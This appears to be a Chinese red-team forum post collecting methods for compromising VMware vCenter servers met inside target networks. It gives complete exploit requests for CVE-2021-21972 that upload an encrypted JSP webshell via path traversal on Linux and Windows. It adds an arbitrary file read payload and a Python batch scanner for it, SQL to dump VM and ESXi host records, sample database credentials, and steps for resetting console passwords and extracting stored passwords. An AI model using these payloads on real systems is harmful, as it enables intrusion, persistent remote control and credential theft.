前言
前段时间参加了几场hw,在目标系统内网环境中遇到了不少Vmware Vcenter,并在实际环境中收集并总结了相关利用方法。
Struts2命令执行获得VCenter
访问发现该地址
struts2执行命令
https://ip/statsreport/ https://10.72.0.110/statsreport/instance.jsp https://10.72.0.110/statsreport/timezoone.jsp https://10.72.0.110/statsreport/statsrepr.jsp
VMware vCenter 未授权文件上传RCE
漏洞介绍
Vmware vCenter的vSphere Client组件中存在未经授权任意文件上传以及务服务器端请求伪造(SSRF)漏洞。其中未授权上传漏洞编号为CVE-2021-21972,该漏洞可以上传一个webshell至vcenter服务器的任意位置,获取vcenter服务器的权限。
影响范围
7.0 U1c 之前的 7.0 版本
6.7 U3l 之前的 6.7 版本
6.5 U3n 之前的 6.5 版本
Linux漏洞POC
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Content-Length: 894
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition: form-data; name="uploadFile"; filename="a.tar"
Content-Type: text/plain
../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>
------WebKitFormBoundaryH8GoragzRFVTw1VD--
windows漏洞POC
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Content-Length: 894
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition: form-data; name="uploadFile"; filename="a.tar"
Content-Type: text/plain
..\..\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\webshell.jsp0000644000000000000000000000102500000000000032532 0ustar00000000000000<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryH8GoragzRFVTw1VD--
POC获取的webshell
对于windows或者linux环境下,我们都可以通过写入webshell来进行RCE。
windows默认存放webshell路径:
C:\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\webshell.jsp
linux默认存放webshell路径:
/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/webshell.jsp
当然对于Linux机器还可以选择在SSH开放外联时写入SSH密钥进行控制
VMware vCenter 任意文件读取批量检测
影响范围
6.5u1该漏洞被修复。
poc:windows下访问
http://ip/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
批量脚本核
备注:经验证有linux的环境,所以加了linux下的简单检测,payload通用
payloads = [r'/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties',r'/eam/vib?id=/etc/passwd']
def http_request(url):
try:
print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
for payload in payloads:
vulurl = url + payload
print(vulurl)
r = requests.get(url=vulurl, timeout=10, verify= False)
if r.status_code == 200 and ('driver' in r.text or 'root:' in r.text):
print("\033[1;40;32m[Vuln] {}\033[0m".format(vulurl))
with open(path_out,'a') as f:
f.write(vulurl + '\n')
return
else:
print("[-]" + "r.status_code:" + str(r.status_code) + "," + "raise.text:" + r.text)
except Exception as err:
print(err)
vcenter服务器默认安装路径+数据库配置账密
C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
url = jdbc:oracle:thin:@//172.16.129.101:1521/hgvpxdb username = vpxadmin
password = oracle
查询容器数量、ip、名称、镜像地址的sql语句
select * from vpxv_vms
查询存在ESXI账号和密码的sql语句
select * from vpxv_hosts
vcenter ESXI
访问ESXI,密码虽在上述数据库中,但为加密保存,暂时没想到办法进行密码解密
https://172.16.129.6
重置vcenter管理控制台密码
该系统为vcenter管理控制台,可通过服务器重置密码,进入(前提拿到该服务器权限)
https://172.16.129.100/ui https://172.16.129.100/ui/saml/websso/sso
https://blog.csdn.net/weixin_34075551/article/details/91504733 重置密码后可登录
取出虚拟主机内的账号密码
可以进入主机后,下载该工具
https://www.nirsoft.net/utils/network_password_recovery.html 虚拟主机扫描后不能复制,知道mssql的话可以tpye查看
vmware vsphere CVE-2021-21972
http://10.1.0.235/ui/vropspluginui/rest/services/uploadova 利用脚本getshell
参考链接
https://blog.csdn.net/weixin_34075551/article/details/91504733
请登录后查看回复内容